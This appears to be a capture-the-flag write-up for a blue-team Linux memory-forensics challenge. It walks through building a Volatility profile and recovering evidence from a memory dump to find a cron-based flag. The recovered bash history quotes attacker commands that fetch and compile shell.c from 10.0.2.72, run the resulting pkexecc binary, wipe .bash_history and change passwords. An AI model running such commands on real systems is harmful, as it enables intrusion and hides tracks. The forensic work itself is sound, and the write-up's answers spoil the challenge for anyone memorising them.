THM | Profiles
A blue team challenge consist of memory forensic challenge
description:
The incident response team has alerted you that there was some suspicious activity on one of the Linux database servers.
A memory dump of the server was taken and provided to you for analysis. You advise the team that you are missing crucial information from the server, but it has already been taken offline. They just made your job a little harder, but not impossible.
Click on the Download Task Files button at the top of this task. You will be provided with an evidence.zip file.
Extract the zip file’s contents and begin your analysis in order to answer the questions.
Note: The challenge is best done using your own environment. I recommend using Volatility 2.6.1 to handle this task and strongly advise using this article by Sean Whalen(opens in new tab) to aid you with the Volatility installation.
In order to properly read the distinctive structures and data found in the memory of that particular operating system, Volatility 2 needs a profile, which contains crucial debugging symbols and system-specific information. The program cannot correctly map and decode the raw binary data from the memory dump without the proper profile, which could result in incorrect analysis or insufficient forensic findings.
vol -f linux.mem banner
Volatility 3 Framework 2.28.0
Progress: 100.00 PDB scanning finished
Offset Banner
0x2f9c4c88 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0xa707c8c8 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0xd46001a0 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0xd619de54 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0x106d64c88 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)We are dealing with Ubuntu 20.04.2 running on the 5.4.0-166-generic kernel
step by step to setup the profile
Step 1: Clone Volatility & Patch Makefile
cd ~/tools
git clone https://github.com/volatilityfoundation/volatility.git volatility_profile
cd volatility_profile/tools/linux
sed -i 's/$(shell uname -r)/5.4.0-166-generic/g' MakefileStep 2: Build Profile via Docker
docker run -it --rm -v $PWD:/volatility ubuntu:20.04 /bin/bashinside the container:
apt update && apt install -y linux-image-5.4.0-166-generic \
linux-headers-5.4.0-166-generic build-essential dwarfdump make zip
cd /volatility
make -C /usr/src/linux-headers-5.4.0-166-generic M=$(pwd) modules
dwarfdump -di module.ko > module.dwarf
zip Ubuntu_5.4.0-166.zip module.dwarf /boot/System.map-5.4.0-166-generic
exitStep 3: Install Profile
cp ~/tools/volatility_profile/tools/linux/Ubuntu_5.4.0-166.zip \
~/.local/lib/python2.7/site-packages/volatility/plugins/overlays/linux/Step 4: Verify
bashvol.py --info | grep "5.4.0-166"
# Output: LinuxUbuntu_5_4_0-166x64 - A Profile for Linux Ubuntu_5.4.0-166 x64
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_banner
# Output: Linux version 5.4.0-166-generic ...FIRST QUESTION
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_bash
Pid Name Command Time Command
-------- -------------------- ------------------------------ -------
1076 bash 2023-11-07 03:49:45 UTC+0000 su root[REDACTED]
1076 bash 2023-11-07 03:49:45 UTC+0000 sqlite3 users.db
1076 bash 2023-11-07 03:49:45 UTC+0000 @????U
1076 bash 2023-11-07 03:49:45 UTC+0000 su root
1076 bash 2023-11-07 03:50:11 UTC+0000 wget 10.0.2.72/shell.c && gcc shell.c -o pkexecc && rm shell.c
1076 bash 2023-11-07 03:50:17 UTC+0000 ./pkexecc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 ls
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get install build-essential linux-headers-`uname -r` git python dwarfdump zip -y
1197 bash 2023-11-07 03:51:49 UTC+0000 passwd paco
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > /home/paco/.bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 passwd root
1197 bash 2023-11-07 03:51:49 UTC+0000 exit
1197 bash 2023-11-07 03:51:49 UTC+0000 rm shell.c
1197 bash 2023-11-07 03:51:49 UTC+0000 ls
1197 bash 2023-11-07 03:51:49 UTC+0000 systemctl restart sshd
1197 bash 2023-11-07 03:51:49 UTC+0000 ls
1197 bash 2023-11-07 03:51:49 UTC+0000 which gcc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 reboot
1197 bash 2023-11-07 03:51:49 UTC+0000 ???2?
1197 bash 2023-11-07 03:51:49 UTC+0000 clear
1197 bash 2023-11-07 03:51:49 UTC+0000 vi /root/.bashrc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get install sqlite3 python3-pip -y
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > /home/paco/.bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 groups paco
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update -y && apt-get upgrade -y
1197 bash 2023-11-07 03:51:49 UTC+0000 exit
1197 bash 2023-11-07 03:51:49 UTC+0000 wget 10.0.2.72/shell.c
1197 bash 2023-11-07 03:51:49 UTC+0000 gcc shell.c -o pkexecc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get install build-essential linux-headers-`uname -r` git python dwarfdump zip -y
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > .bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 snap remove lxd
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > /home/paco/.bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 gpasswd -d paco lxd
1197 bash 2023-11-07 03:51:49 UTC+0000 systemctl restart ssh
1197 bash 2023-11-07 03:51:49 UTC+0000 vi /etc/ssh/sshd_config
1197 bash 2023-11-07 03:51:49 UTC+0000 exit
1197 bash 2023-11-07 03:52:07 UTC+0000 git clone https://github.com/504ensicsLabs/LiME && cd LiME/src/
1197 bash 2023-11-07 03:52:12 UTC+0000 make
1197 bash 2023-11-07 03:52:21 UTC+0000 ls
1197 bash 2023-11-07 03:52:37 UTC+0000 insmod lime-5.4.0-166-generic.ko "path=/home/paco/linux.mem format=lime"
SECOND QUESTION
based on the bash history we can see that the user trying to run a file which is pkexecc,using this finding we enumerate the files, use the linux_enumerate_fies to enumerate all the files inside the memory and filtered it out using grep, and grap the nodes to get the file using linux_find_file
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_enumerate_files | grep pkexec
Volatility Foundation Volatility Framework 2.6.1
0xffff8903b2364120 655377 /home/paco/pkexecc
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_find_file -i 0xffff8903b2364120 -O pkexecc
md5sum pkexecc
[REDACTED] pkexecc
THIRD QUESTION
based on linux_bash we found an ip of 10.0.2.72, and we can use linux_netstat to dump the netstat info on this memory file
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_netstat
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
UNIX 26341 su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
UNIX 26358 sshd/1099
TCP 10.0.2.73 : 22 10.0.2.72 :57690 ESTABLISHED sshd/1099 FOURTH QUESTION
we need to find the right cron file, we can use the linux_enumerate_files to enum the cron files
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_enumerate_files | grep -i "cron"
Volatility Foundation Volatility Framework 2.6.1
0xffff890490abfb80 690 /run/crond.reboot
0xffff89048a49f5e0 687 /run/crond.pid
0xffff89048a49d150 680 /run/systemd/units/invocation:cron.service
0xffff890499e90dc0 131180 /var/spool/cron
0xffff890499fa1650 131184 /var/spool/cron/crontabs
0xffff8903b23667a8 131127 /var/spool/cron/crontabs/root
0xffff890499f6f038 131182 /var/spool/cron/atjobs
0xffff89049a16e360 13246 /usr/sbin/cron
0xffff890499fa0dc0 524314 /etc/cron.d
0xffff890499fa3890 525443 /etc/cron.d/e2scrub_all
0xffff890499fa67a8 525444 /etc/cron.d/popularity-contest
0xffff890499fa4120 524970 /etc/crontab
0xffff89048e4a5240 525520 /etc/init.d/cron
0xffff890499e95ad0 525468 /etc/default/cronFIFTH QUESTION
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_find_file -i [REDACTED] -O cronafter find the correct cron file, retrieve the file and read the file for the final flag